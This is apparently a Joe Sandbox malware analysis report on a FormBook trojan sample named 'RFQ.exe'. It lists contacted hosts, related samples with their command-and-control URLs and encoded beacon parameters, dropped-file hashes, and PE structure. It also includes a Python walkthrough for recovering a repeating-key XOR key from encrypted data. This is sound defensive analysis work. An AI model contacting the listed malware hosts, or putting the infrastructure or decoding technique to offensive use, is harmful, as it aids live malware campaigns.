https://www.gandi.net/en/domain | net.exe, 00000003.00000002.3508009639.0000000004016000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3509615989.0000000006330000.00000004.00000800.00020000.00000000.sdmp, net.exe, 00000003.00000002.3508009639.0000000004982000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000043A2000.00000004.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003A36000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://whois.gandi.net/en/results?search=astorg-group.info | net.exe, 00000003.00000002.3509615989.0000000006330000.00000004.00000800.00020000.00000000.sdmp, net.exe, 00000003.00000002.3508009639.0000000004982000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000043A2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | net.exe, 00000003.00000002.3508009639.000000000433A000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3508009639.00000000041A8000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003BC8000.00000004.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
47.52.221.8 | www.wukong.college | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
128.65.195.180 | www.evoo.website | Switzerland | 29222 | INFOMANIAK-ASCH | false
23.106.59.18 | ppp84k45ss7ehy8ypic5x.limelightcdn.com | United Kingdom | 205544 | LEASEWEB-UK-LON-11GB | false
199.59.243.227 | 77980.bodis.com | United States | 395082 | BODIS-NJUS | false
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | false
209.74.64.58 | www.pluribiz.life | United States | 31744 | MULTIBAND-NEWHOPEUS | false
3.33.130.190 | fiqsth.vip | United States | 8987 | AMAZONEXPANSIONGB | false
47.242.89.146 | www.kdtzhb.top | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1554222
Start date and time: 2024-11-12 08:50:49 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@12/8
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 39
• Number of non-executed functions: 308
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target aSgPuBFuPS.exe, PID 3732 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: RFQ.exe
Time | Type | Description
02:52:30 | API Interceptor | 7352043x Sleep call for process: net.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 47.52.221.8
  RFQ.exe | Get hash | malicious | FormBook | Browse | www.wukong.college/9ezc/
  XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | www.wukong.college/9ezc/
Match: 128.65.195.180
  RFQ.exe | Get hash | malicious | FormBook | Browse | www.evoo.website/293d/
  XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | www.evoo.website/293d/
  TT Application copy.exe | Get hash | malicious | FormBook | Browse | www.airbnbneuchatel.com/0zfk/
  Inquiry Second Reminder.exe | Get hash | malicious | FormBook | Browse | www.spx21.com/dz25/?9rz0r6F8=IXjUS8uTLEXXc4IFKSk4QK94/u/v4rSLXrhItQqacAC9jZYA+NiFbTAYaFgWrpFehgvY&RP=7nHTxl6
  LPOH2401-3172(Mr.Kem Sophea)-pdf.exe | Get hash | malicious | FormBook | Browse | www.zimmerli.online/btrd/?E2MXNj=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT&bt-=XVJdUxa8
  PGiUp8uqGt.exe | Get hash | malicious | FormBook | Browse | www.zimmerli.online/btrd/?2dz=odelT&-Z1dnr=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT
  LGSTXJeTc4.exe | Get hash | malicious | FormBook | Browse | www.zimmerli.online/btrd/?bXUH_86P=TxZDFykb+0Hph0GWgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPqsFIgKb+U&lzud6=y6gL_DWH
  MVEjijPB3m.exe | Get hash | malicious | FormBook | Browse | www.zimmerli.online/btrd/?7n=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&q6AhA=ORGpz4MpyH
  luK5jtgopg.exe | Get hash | malicious | FormBook | Browse | www.zimmerli.online/btrd/?_vgLOdj=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&W0Ddg8=u2Jd-dT8bPB0k
  iKF9HO6p8LJfhir.exe | Get hash | malicious | FormBook, Play | Browse | www.derbychess.com/qfhc/?cNu_sBI=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQXkVKyniTIgT66iQ==&mg3Oy_=oFKCX
Match: 23.106.59.18
  XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | www.vehiculargustav.click/95c0/
  SecuriteInfo.com.FileRepMalware.15071.2577.exe | Get hash | malicious | Unknown | Browse | dotdo.net/chkn.php?n=4528372
Match: 199.59.243.227
  Arrival Notice.exe | Get hash | malicious | FormBook | Browse | www.vnxoso88.art/sciu/
  8dPlV2lT8o.exe | Get hash | malicious | Simda Stealer | Browse | ww25.lyxynyx.com/login.php?subid1=20241112-0512-3242-8891-570009ea3cb2
  7ObLFE2iMK.exe | Get hash | malicious | Simda Stealer | Browse | vojyqem.com/login.php
  UMwpXhA46R.exe | Get hash | malicious | Simda Stealer | Browse | vojyqem.com/login.php
  1fWgBXPgiT.exe | Get hash | malicious | Simda Stealer | Browse | ww25.lyxynyx.com/login.php?subid1=20241112-0450-16f3-ae99-53051689f189
  arxtPs1STE.exe | Get hash | malicious | Simda Stealer | Browse | vojyqem.com/login.php
  Z8eHwAvqAh.exe | Get hash | malicious | Simda Stealer | Browse | vojyqem.com/login.php
  WlCVLbzNph.exe | Get hash | malicious | Simda Stealer | Browse | ww25.lyxynyx.com/login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150
  Bpfz752pYZ.exe | Get hash | malicious | Simda Stealer | Browse | vojyqem.com/login.php
  uavINoSIQh.exe | Get hash | malicious | Simda Stealer | Browse | vojyqem.com/login.php
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 77980.bodis.com
  Arrival Notice.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
  8dPlV2lT8o.exe | Get hash | malicious | Simda Stealer | Browse | 199.59.243.227
  7ObLFE2iMK.exe | Get hash | malicious | Simda Stealer | Browse | 199.59.243.227
  UMwpXhA46R.exe | Get hash | malicious | Simda Stealer | Browse | 199.59.243.227
  1fWgBXPgiT.exe | Get hash | malicious | Simda Stealer | Browse | 199.59.243.227
  arxtPs1STE.exe | Get hash | malicious | Simda Stealer | Browse | 199.59.243.227
  Z8eHwAvqAh.exe | Get hash | malicious | Simda Stealer | Browse | 199.59.243.227
  WlCVLbzNph.exe | Get hash | malicious | Simda Stealer | Browse | 199.59.243.227
  Bpfz752pYZ.exe | Get hash | malicious | Simda Stealer | Browse | 199.59.243.227
  uavINoSIQh.exe | Get hash | malicious | Simda Stealer | Browse | 199.59.243.227
Match: webredir.vip.gandi.net
  RFQ.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
  XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
  SWIFT.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
  #10302024.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
  rPO-000172483.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
  PO-000041522.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
  Doc 784-01965670.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
  rDebitadvice22_10_2024.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
  PO#071024.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
  PO#001498.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
Match: www.evoo.website
  RFQ.exe | Get hash | malicious | FormBook | Browse | 128.65.195.180
  XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 128.65.195.180
Match: www.wukong.college
  RFQ.exe | Get hash | malicious | FormBook | Browse | 47.52.221.8
  XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 47.52.221.8
Match | Associated Sample Name / URL | Detection | Threat Name | Context
INFOMANIAK-ASCH | RFQ.exe | malicious | FormBook | 128.65.195.180
 | XhAQ0Rk63O.exe | malicious | FormBook | 128.65.195.180
 | https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL | malicious | Ratty | 128.65.195.91
 | https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL | malicious | Ratty | 128.65.195.91
 | z95ordemdecomprapdfx4672xx.exe | malicious | FormBook | 84.16.66.164
 | Doc.exe | malicious | Sliver | 128.65.199.135
 | Nowe zam#U00f3wienie zakupu pdf.exe | malicious | FormBook | 84.16.66.164
 | TT Application copy.exe | malicious | FormBook | 128.65.195.180
 | eqqjbbjMlt.elf | malicious | Unknown | 84.16.66.164
 | hNX3ktCRra.elf | malicious | Unknown | 84.16.66.164
BODIS-NJUS | Arrival Notice.exe | malicious | FormBook | 199.59.243.227
 | 8dPlV2lT8o.exe | malicious | Simda Stealer | 199.59.243.227
 | 7ObLFE2iMK.exe | malicious | Simda Stealer | 199.59.243.227
 | UMwpXhA46R.exe | malicious | Simda Stealer | 199.59.243.227
 | 1fWgBXPgiT.exe | malicious | Simda Stealer | 199.59.243.227
 | arxtPs1STE.exe | malicious | Simda Stealer | 199.59.243.227
 | Z8eHwAvqAh.exe | malicious | Simda Stealer | 199.59.243.227
 | WlCVLbzNph.exe | malicious | Simda Stealer | 199.59.243.227
 | Bpfz752pYZ.exe | malicious | Simda Stealer | 199.59.243.227
 | uavINoSIQh.exe | malicious | Simda Stealer | 199.59.243.227
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://gerneva.com | malicious | Unknown | 47.251.24.229
 | sora.sh4.elf | malicious | Mirai | 147.139.148.16
 | https://canadapost.postescanadry.xyz/ca | malicious | Unknown | 47.251.115.90
 | s-white-82333.js | malicious | Unknown | 8.209.119.17
 | s-white-82333.js | malicious | Unknown | 8.209.119.17
 | 7sugT5Gudk.exe | malicious | Unknown | 47.240.68.28
 | arm7.elf | malicious | Mirai | 8.208.73.228
 | RFQ.exe | malicious | FormBook | 47.242.89.146
 | byte.x86.elf | malicious | Mirai, Okiru | 8.214.203.151
 | 8WdO7I87E1.elf | malicious | Mirai, Moobot | 47.244.127.62
LEASEWEB-UK-LON-11GB | XhAQ0Rk63O.exe | malicious | FormBook | 23.106.59.18
 | SecuriteInfo.com.FileRepMalware.27261.32754.exe | malicious | Unknown | 23.106.59.52
 | SecuriteInfo.com.ELF.Agent-AIN.28488.28782.elf | malicious | Mirai | 95.168.183.162
 | SecuriteInfo.com.FileRepMalware.15071.2577.exe | malicious | Unknown | 23.106.59.18
 | 5672D5B80770DEB68BF2435FEF12D521C04CE012250CC.exe | malicious | Unknown | 23.106.59.52
 | F85362FA96806CE4FF93B8A49E0E74F65DEA0B759AE87.exe | malicious | Unknown | 23.106.59.52
 | d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe | malicious | Unknown | 23.106.59.52
 | d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe | malicious | Unknown | 23.106.59.52
 | 69e6517b2ee056dd1f5f70c46faf6235b84db97a74a65.exe | malicious | Unknown | 23.106.59.52
 | 69e6517b2ee056dd1f5f70c46faf6235b84db97a74a65.exe | malicious | Unknown | 23.106.59.52
                                                                          No context
                                                                          No context
Process: C:\Windows\SysWOW64\net.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\RFQ.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.9954492864746225
Encrypted: true
SSDEEP: 6144:hl1xB50rljRyJF4onj1Ld826/j3rjPlmfoT6FWBTE6U9CuXYI:b1xoRU8onj1c/j7jPlmfN2T8ouX1
MD5: B34C8BC7922F975DF317643497031AB4
SHA1: F2825F7B5004C55A26FE310B40F981DC7105CDF6
SHA-256: 8F7342284DADD7C4485EF7F9D999C313841D0FCD50D5B59013AEF7BFED18B64F
SHA-512: 60FF29E6F4DBECC9A6623B748255133982F3DB9CBB76E32665CF45B5AE71B7625CDF6ACC50F9CE1974EC139205749D3143233CAC35A0B09F898CF0044F703958
Malicious: false
Reputation: low
                                                                          Preview:.j...SESH..0..~.Y1...f3@...ESHBZC9ALKXBVY2JO6N0HJXSESHBZC.ALKV].W2.F.o.I..r.;!1z3K.+99/v:S$!Y:.*/x!0=h+4c}..k5-2<.GB<j0HJXSES1CS..!+.e"1..*(.T..b3".R...!+.B....*(..Y+"e3".HBZC9ALK..VY~KN6G.E.XSESHBZC.ANJSC]Y2.K6N0HJXSES.VZC9QLKX2RY2J.6N HJXQESNBZC9ALK^BVY2JO6N@LJXQESHBZC;A..XBFY2ZO6N0XJXCESHBZC)ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6`D-2,SESl.^C9QLKX.RY2ZO6N0HJXSESHBZC.AL+XBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALKXBVY2JO6N0HJXSESHBZC9ALK
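The preview of this 288,768-byte file written by RFQ.exe repeats the 24-byte sequence SESHBZC9ALKXBVY2JO6N0HJX, while the file as a whole scores entropy 7.995 and is flagged as encrypted. A periodic printable run inside otherwise high-entropy data is what a repeating-key XOR looks like over a zero-filled (or constant) region of the plaintext: where the plaintext byte is 0x00 the key byte is written out verbatim. Whether that is what this file is has not been verified on this page. The Python below is an added example, not Joe Sandbox code and not taken from the sample; it runs on a constructed buffer XOR-ed with that 24-byte sequence as a hypothesised key. It finds the longest periodic run, reads the key out of it, re-aligns it to file offset 0 (the run almost never starts on a key boundary) and decrypts.

```python
# Repeating-key XOR: recovering the key from the stretch where it shows through zero bytes.
# Added example for this page; the key below is the run seen in the report's preview,
# treated here as a hypothesis, not as a confirmed property of the dropped file.

KEY_CANDIDATE = b"SESHBZC9ALKXBVY2JO6N0HJX"


def repeating_xor(data: bytes, key: bytes) -> bytes:
    """XOR every byte with the key byte at the same offset modulo the key length."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def longest_periodic_run(data: bytes, max_period: int = 64, min_len: int = 96):
    """Return (offset, period, length) of the longest stretch where data[i] == data[i + period].
    Periods are tried in ascending order and ties are not replaced, so a key repeated k times
    is reported with its true length rather than as a k*len(key) key."""
    best = None
    n = len(data)
    for p in range(1, max_period + 1):
        i = 0
        while i + p < n:
            if data[i] != data[i + p]:
                i += 1
                continue
            start = i
            while i + p < n and data[i] == data[i + p]:
                i += 1
            length = i - start + p
            if length >= min_len and (best is None or length > best[2]):
                best = (start, p, length)
    return best


def recover_key(data: bytes):
    """Assuming a repeating-key XOR over a zero-filled region, the region's bytes are the key
    itself, rotated by the region's file offset. Returns the key aligned to offset 0, or None."""
    run = longest_periodic_run(data)
    if run is None:
        return None
    start, period, _ = run
    rotated = data[start:start + period]
    return bytes(rotated[(t - start) % period] for t in range(period))


def build_sample_blob() -> bytes:
    """Constructed input (not the dropped file): a text header, 512 zero bytes where the key
    will leak, and a text trailer, all XOR-ed with KEY_CANDIDATE."""
    plaintext = (b"CONSTRUCTED HEADER, NOT FROM THE SAMPLE\n"
                 + b"\0" * 0x200
                 + b"trailer: c2=example.invalid\n")
    return repeating_xor(plaintext, KEY_CANDIDATE)


if __name__ == "__main__":
    blob = build_sample_blob()
    key = recover_key(blob)
    print("run:", longest_periodic_run(blob), "key:", key)
    print(repeating_xor(blob, key)[:40])
```

Against the real dropped file the check is the same: run recover_key over it and look at whether the decrypted bytes start with something recognisable (MZ, PK, a config string). If they do not, the encoding is layered or not XOR at all and the repeated run is something else, such as an embedded marker. The entropy figure does not help here: repeating-key XOR leaves already-random plaintext random, so the 7.995 says nothing about the key length; only the zero region leaks it.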
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.413126135947961
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: RFQ.exe
File size: 1'604'608 bytes
MD5: b5e39c660b2e4f19cc14b94df9b6497c
SHA1: ee331feebc062f0b0a226d36e8f0817af0cc9d65
SHA256: 593c8605076c650720fcdfa1fada91472d792da661c0f6713f857a9780a6a6eb
SHA512: 1355844266b462ec0f74642436b299bdd18246ed6c844513a687d368c338cea99b5f5d310af24477997113bd320e71f12e07d524794ebdb78c7fe5726d3a4ba8
SSDEEP: 24576:O5EmXFtKaL4/oFe5T9yyXYfP1ijXdaVLVEw40CJvqQTax1uFBJG38Pwm4j:OPVt/LZeJbInQRaVhBzCJyQKgBJdP7
TLSH: 2775D0027381D022FFAB95334B5AF6115BBC79260123E62F13981DB9BE705B1563E7A3
                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x4204f7
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6731F54F [Mon Nov 11 12:15:11 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 0b768923437678ce375719e30b21693e
                                                                          Instruction
                                                                          call 00007FAC50B1B1C3h
                                                                          jmp 00007FAC50B1AACFh
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007FAC50B1ACADh
                                                                          mov dword ptr [esi], 0049FE10h
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          and dword ptr [ecx+04h], 00000000h
                                                                          mov eax, ecx
                                                                          and dword ptr [ecx+08h], 00000000h
                                                                          mov dword ptr [ecx+04h], 0049FE18h
                                                                          mov dword ptr [ecx], 0049FE10h
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007FAC50B1AC7Ah
                                                                          mov dword ptr [esi], 0049FE2Ch
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          and dword ptr [ecx+04h], 00000000h
                                                                          mov eax, ecx
                                                                          and dword ptr [ecx+08h], 00000000h
                                                                          mov dword ptr [ecx+04h], 0049FE34h
                                                                          mov dword ptr [ecx], 0049FE2Ch
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          mov esi, ecx
                                                                          lea eax, dword ptr [esi+04h]
                                                                          mov dword ptr [esi], 0049FDF0h
                                                                          and dword ptr [eax], 00000000h
                                                                          and dword ptr [eax+04h], 00000000h
                                                                          push eax
                                                                          mov eax, dword ptr [ebp+08h]
                                                                          add eax, 04h
                                                                          push eax
                                                                          call 00007FAC50B1D87Dh
                                                                          pop ecx
                                                                          pop ecx
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          lea eax, dword ptr [ecx+04h]
                                                                          mov dword ptr [ecx], 0049FDF0h
                                                                          push eax
                                                                          call 00007FAC50B1D8C8h
                                                                          pop ecx
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          mov esi, ecx
                                                                          lea eax, dword ptr [esi+04h]
                                                                          mov dword ptr [esi], 0049FDF0h
                                                                          push eax
                                                                          call 00007FAC50B1D8B1h
                                                                          test byte ptr [ebp+08h], 00000001h
                                                                          pop ecx
                                                                          Programming Language:
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e74 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xb11b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x186000 | 0x75cc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb1010 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3420 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1030 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9aa37 | 0x9ac00 | 17187df51446e12491449bc34d849147 | False | 0.5653003205775444 | data | 6.665680008888402 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb92 | 0x2fc00 | 8ab1e4a7788882b436d7b30c3a4c9b0c | False | 0.3529327552356021 | data | 5.692798211199345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x705c | 0x4800 | c69381d9330fec33b92360836b24215a | False | 0.043511284722222224 | DOS executable (block device driver @\273\) | 0.5845774219571381 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xb11b8 | 0xb1200 | 5fb9554f38b043e9a80570ac450e7f76 | False | 0.9632531316160904 | data | 7.9618569404063555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x186000 | 0x75cc | 0x7600 | 40b4850993e12fb1b505490e48047c95 | False | 0.7645325741525424 | data | 6.798203799100818 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
